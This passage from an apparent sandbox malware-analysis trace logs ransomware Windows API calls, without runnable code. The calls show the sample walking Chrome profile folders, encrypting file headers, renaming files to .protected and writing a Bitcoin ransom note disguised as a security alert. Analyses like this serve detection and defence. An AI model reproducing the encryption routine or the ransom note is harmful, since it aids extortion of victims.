"c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_metadata\\computed_hashes.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_metadata\\computed_hashes.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_metadata\\computed_hashes.json.protected")) returned 1 [0084.047] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0084.047] lstrcmpiW (lpString1="verified_contents.json", lpString2="Windows") returned -1 [0084.047] lstrcmpiW (lpString1="verified_contents.json", lpString2="Program Files") returned 1 [0084.047] lstrcmpiW (lpString1="verified_contents.json", lpString2="Program Files (x86)") returned 1 [0084.047] lstrcmpiW (lpString1="verified_contents.json", lpString2="$Recycle.bin") returned 1 [0084.047] lstrcmpiW (lpString1="verified_contents.json", lpString2="System Volume Information") returned 1 [0084.048] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_metadata\\verified_contents.json") returned 171 [0084.048] StrStrIW (lpFirst="verified_contents.json", lpSrch=".protected") returned 0x0 [0084.048] lstrcmpW (lpString1="verified_contents.json", lpString2="RESTORE_FILES.txt") returned 1 [0084.048] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295db3c | out: pbBuffer=0x295db3c) returned 1 [0084.048] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295db64*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295db64*=0x30) returned 1 [0084.048] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_metadata\\verified_contents.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_metadata\\verified_contents.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0084.048] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_metadata\\verified_contents.json") returned 171 [0084.048] StrStrW (lpFirst="verified_contents.json", lpSrch=".txt") returned 0x0 [0084.048] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_metadata\\verified_contents.json") returned 171 [0084.048] StrStrW (lpFirst="verified_contents.json", lpSrch=".rar") returned 0x0 [0084.048] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_metadata\\verified_contents.json") returned 171 [0084.048] StrStrW (lpFirst="verified_contents.json", lpSrch=".zip") returned 0x0 [0084.048] ReadFile (in: hFile=0x164, lpBuffer=0xd010e0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xd010e0*, lpNumberOfBytesRead=0x295db84*=0x2800, lpOverlapped=0x0) returned 1 [0084.051] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.051] WriteFile (in: hFile=0x164, lpBuffer=0xd010e0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xd010e0*, lpNumberOfBytesWritten=0x295db84*=0x2800, lpOverlapped=0x0) returned 1 [0084.052] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.052] WriteFile (in: hFile=0x164, lpBuffer=0x295db5c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0x295db5c*, lpNumberOfBytesWritten=0x295db84*=0x4, lpOverlapped=0x0) returned 1 [0084.052] WriteFile (in: hFile=0x164, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295db84*=0x30, lpOverlapped=0x0) returned 1 [0084.052] CloseHandle (hObject=0x164) returned 1 [0084.052] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_metadata\\verified_contents.json.protected") returned 181 [0084.052] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_metadata\\verified_contents.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_metadata\\verified_contents.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_metadata\\verified_contents.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_metadata\\verified_contents.json.protected")) returned 1 [0084.052] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 0 [0084.052] FindClose (in: hFindFile=0x47bbd0 | out: hFindFile=0x47bbd0) returned 1 [0084.052] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_metadata\\RESTORE_FILES.txt") returned 166 [0084.052] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_metadata\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_metadata\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0084.065] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0084.065] WriteFile (in: hFile=0x160, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295db84*=0x53d, lpOverlapped=0x0) returned 1 [0084.066] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0084.066] WriteFile (in: hFile=0x160, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295db84*=0x2ac, lpOverlapped=0x0) returned 1 [0084.066] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0084.066] WriteFile (in: hFile=0x160, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295db84*=0xb1, lpOverlapped=0x0) returned 1 [0084.066] CloseHandle (hObject=0x160) returned 1 [0084.066] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 0 [0084.066] FindClose (in: hFindFile=0x47bb90 | out: hFindFile=0x47bb90) returned 1 [0084.066] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\RESTORE_FILES.txt") returned 156 [0084.066] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0084.067] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0084.067] WriteFile (in: hFile=0x15c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ddf4*=0x53d, lpOverlapped=0x0) returned 1 [0084.068] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0084.068] WriteFile (in: hFile=0x15c, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ddf4*=0x2ac, lpOverlapped=0x0) returned 1 [0084.068] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0084.068] WriteFile (in: hFile=0x15c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ddf4*=0xb1, lpOverlapped=0x0) returned 1 [0084.068] CloseHandle (hObject=0x15c) returned 1 [0084.069] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 0 [0084.069] FindClose (in: hFindFile=0x47bb50 | out: hFindFile=0x47bb50) returned 1 [0084.069] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\RESTORE_FILES.txt") returned 141 [0084.069] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0084.069] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0084.069] WriteFile (in: hFile=0x158, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e064*=0x53d, lpOverlapped=0x0) returned 1 [0084.070] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0084.070] WriteFile (in: hFile=0x158, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e064*=0x2ac, lpOverlapped=0x0) returned 1 [0084.070] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0084.070] WriteFile (in: hFile=0x158, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e064*=0xb1, lpOverlapped=0x0) returned 1 [0084.070] CloseHandle (hObject=0x158) returned 1 [0084.070] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0 [0084.070] FindClose (in: hFindFile=0x47bb10 | out: hFindFile=0x47bb10) returned 1 [0084.070] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\RESTORE_FILES.txt") returned 108 [0084.071] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0084.071] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0084.071] WriteFile (in: hFile=0x154, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e2d4*=0x53d, lpOverlapped=0x0) returned 1 [0084.071] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0084.071] WriteFile (in: hFile=0x154, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e2d4*=0x2ac, lpOverlapped=0x0) returned 1 [0084.072] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0084.072] WriteFile (in: hFile=0x154, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e2d4*=0xb1, lpOverlapped=0x0) returned 1 [0084.072] CloseHandle (hObject=0x154) returned 1 [0084.072] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0084.072] lstrcmpiW (lpString1="Favicons", lpString2="Windows") returned -1 [0084.072] lstrcmpiW (lpString1="Favicons", lpString2="Program Files") returned -1 [0084.072] lstrcmpiW (lpString1="Favicons", lpString2="Program Files (x86)") returned -1 [0084.072] lstrcmpiW (lpString1="Favicons", lpString2="$Recycle.bin") returned 1 [0084.072] lstrcmpiW (lpString1="Favicons", lpString2="System Volume Information") returned -1 [0084.072] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Favicons") returned 88 [0084.072] StrStrIW (lpFirst="Favicons", lpSrch=".protected") returned 0x0 [0084.072] lstrcmpW (lpString1="Favicons", lpString2="RESTORE_FILES.txt") returned -1 [0084.072] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0084.072] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0084.072] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Favicons" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\favicons"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0084.072] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Favicons") returned 88 [0084.072] StrStrW (lpFirst="Favicons", lpSrch=".txt") returned 0x0 [0084.072] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Favicons") returned 88 [0084.072] StrStrW (lpFirst="Favicons", lpSrch=".rar") returned 0x0 [0084.072] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Favicons") returned 88 [0084.072] StrStrW (lpFirst="Favicons", lpSrch=".zip") returned 0x0 [0084.072] ReadFile (in: hFile=0x154, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e544*=0x2800, lpOverlapped=0x0) returned 1 [0084.086] SetFilePointerEx (in: hFile=0x154, 